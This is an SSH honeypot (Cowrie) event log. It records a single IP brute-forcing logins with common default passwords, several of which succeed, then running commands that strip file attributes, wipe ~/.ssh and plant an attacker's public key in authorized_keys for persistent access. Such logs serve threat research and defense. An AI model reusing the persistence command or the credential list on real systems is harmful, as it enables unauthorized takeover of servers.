{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:59:10.865160Z","src_ip":"212.227.235.229","session":"2fcb86777fe1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:59:11.110013Z","src_ip":"212.227.235.229","session":"2fcb86777fe1"}
{"eventid":"cowrie.login.failed","username":"access","password":"P@ssw0rd","message":"login attempt [access/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-09-09T01:59:12.130002Z","src_ip":"212.227.235.229","session":"2fcb86777fe1"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:59:13.377267Z","src_ip":"212.227.235.229","session":"2fcb86777fe1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48410,"dst_ip":"1.2.3.4","dst_port":22,"session":"d3effe177614","protocol":"ssh","message":"New connection: 212.227.235.229:48410 (1.2.3.4:22) [session: d3effe177614]","sensor":"my-vps","timestamp":"2025-09-09T01:59:22.256193Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:59:22.257309Z","src_ip":"212.227.235.229","session":"d3effe177614"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:59:22.343488Z","src_ip":"212.227.235.229","session":"d3effe177614"}
{"eventid":"cowrie.login.failed","username":"nvidia","password":"111","message":"login attempt [nvidia/111] failed","sensor":"my-vps","timestamp":"2025-09-09T01:59:22.732867Z","src_ip":"212.227.235.229","session":"d3effe177614"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:59:23.821222Z","src_ip":"212.227.235.229","session":"d3effe177614"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":52214,"dst_ip":"1.2.3.4","dst_port":22,"session":"b5d36e195b36","protocol":"ssh","message":"New connection: 217.72.205.35:52214 (1.2.3.4:22) [session: b5d36e195b36]","sensor":"my-vps","timestamp":"2025-09-09T01:59:33.547018Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:59:33.548068Z","src_ip":"217.72.205.35","session":"b5d36e195b36"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56404,"dst_ip":"1.2.3.4","dst_port":22,"session":"bcf797b4c915","protocol":"ssh","message":"New connection: 212.227.235.229:56404 (1.2.3.4:22) [session: bcf797b4c915]","sensor":"my-vps","timestamp":"2025-09-09T01:59:36.302120Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:59:36.302818Z","src_ip":"212.227.235.229","session":"bcf797b4c915"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:59:36.564797Z","src_ip":"212.227.235.229","session":"bcf797b4c915"}
{"eventid":"cowrie.login.failed","username":"csserver","password":"csserver","message":"login attempt [csserver/csserver] failed","sensor":"my-vps","timestamp":"2025-09-09T01:59:37.655349Z","src_ip":"212.227.235.229","session":"bcf797b4c915"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:59:38.920322Z","src_ip":"212.227.235.229","session":"bcf797b4c915"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38340,"dst_ip":"1.2.3.4","dst_port":22,"session":"720d7b38b934","protocol":"ssh","message":"New connection: 212.227.235.229:38340 (1.2.3.4:22) [session: 720d7b38b934]","sensor":"my-vps","timestamp":"2025-09-09T01:59:41.161341Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:59:41.162064Z","src_ip":"212.227.235.229","session":"720d7b38b934"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:59:41.422137Z","src_ip":"212.227.235.229","session":"720d7b38b934"}
{"eventid":"cowrie.login.success","username":"root","password":"huawei@1","message":"login attempt [root/huawei@1] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:59:42.503235Z","src_ip":"212.227.235.229","session":"720d7b38b934"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:59:43.085258Z","src_ip":"212.227.235.229","session":"720d7b38b934"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:59:43.085943Z","src_ip":"212.227.235.229","session":"720d7b38b934"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:59:43.086991Z","src_ip":"212.227.235.229","session":"720d7b38b934"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:59:43.348368Z","src_ip":"212.227.235.229","session":"720d7b38b934"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:59:43.890119Z","src_ip":"212.227.235.229","session":"720d7b38b934"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:59:43.891074Z","src_ip":"212.227.235.229","session":"720d7b38b934"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:59:44.153592Z","src_ip":"212.227.235.229","session":"720d7b38b934"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:59:44.154493Z","src_ip":"212.227.235.229","session":"720d7b38b934"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39542,"dst_ip":"1.2.3.4","dst_port":22,"session":"2448a8b8bf04","protocol":"ssh","message":"New connection: 212.227.235.229:39542 (1.2.3.4:22) [session: 2448a8b8bf04]","sensor":"my-vps","timestamp":"2025-09-09T01:59:44.411978Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:59:44.412880Z","src_ip":"212.227.235.229","session":"2448a8b8bf04"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:59:44.672829Z","src_ip":"212.227.235.229","session":"2448a8b8bf04"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T01:59:45.751266Z","src_ip":"212.227.235.229","session":"2448a8b8bf04"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:59:47.012851Z","src_ip":"212.227.235.229","session":"2448a8b8bf04"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40746,"dst_ip":"1.2.3.4","dst_port":22,"session":"19a21b47101d","protocol":"ssh","message":"New connection: 212.227.235.229:40746 (1.2.3.4:22) [session: 19a21b47101d]","sensor":"my-vps","timestamp":"2025-09-09T01:59:47.269329Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:59:47.270182Z","src_ip":"212.227.235.229","session":"19a21b47101d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:59:47.527160Z","src_ip":"212.227.235.229","session":"19a21b47101d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:59:48.595916Z","src_ip":"212.227.235.229","session":"19a21b47101d"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:59:48.853923Z","src_ip":"212.227.235.229","session":"19a21b47101d"}
{"eventid":"cowrie.session.closed","duration":"7.7","message":"Connection lost after 7.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:59:48.854929Z","src_ip":"212.227.235.229","session":"720d7b38b934"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57888,"dst_ip":"1.2.3.4","dst_port":22,"session":"f81ccffcdd7e","protocol":"ssh","message":"New connection: 212.227.235.229:57888 (1.2.3.4:22) [session: f81ccffcdd7e]","sensor":"my-vps","timestamp":"2025-09-09T01:59:53.316674Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:59:53.317545Z","src_ip":"212.227.235.229","session":"f81ccffcdd7e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:59:53.557079Z","src_ip":"212.227.235.229","session":"f81ccffcdd7e"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"Password1","message":"login attempt [postgres/Password1] failed","sensor":"my-vps","timestamp":"2025-09-09T01:59:54.518184Z","src_ip":"212.227.235.229","session":"f81ccffcdd7e"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:59:55.761370Z","src_ip":"212.227.235.229","session":"f81ccffcdd7e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42624,"dst_ip":"1.2.3.4","dst_port":22,"session":"36b5bb706ce6","protocol":"ssh","message":"New connection: 212.227.235.229:42624 (1.2.3.4:22) [session: 36b5bb706ce6]","sensor":"my-vps","timestamp":"2025-09-09T01:59:58.493114Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:59:58.495069Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:59:59.727044Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33670,"dst_ip":"1.2.3.4","dst_port":22,"session":"e320448760ec","protocol":"ssh","message":"New connection: 212.227.235.229:33670 (1.2.3.4:22) [session: e320448760ec]","sensor":"my-vps","timestamp":"2025-09-09T01:59:59.831650Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:59:59.832333Z","src_ip":"212.227.235.229","session":"e320448760ec"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:59:59.941767Z","src_ip":"212.227.235.229","session":"e320448760ec"}
{"eventid":"cowrie.login.failed","username":"builder","password":"builder.123","message":"login attempt [builder/builder.123] failed","sensor":"my-vps","timestamp":"2025-09-09T02:00:00.420375Z","src_ip":"212.227.235.229","session":"e320448760ec"}
{"eventid":"cowrie.login.success","username":"root","password":"yg123456","message":"login attempt [root/yg123456] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:00:01.195626Z","src_ip":"212.227.235.229","session":"36b5bb706ce6"}
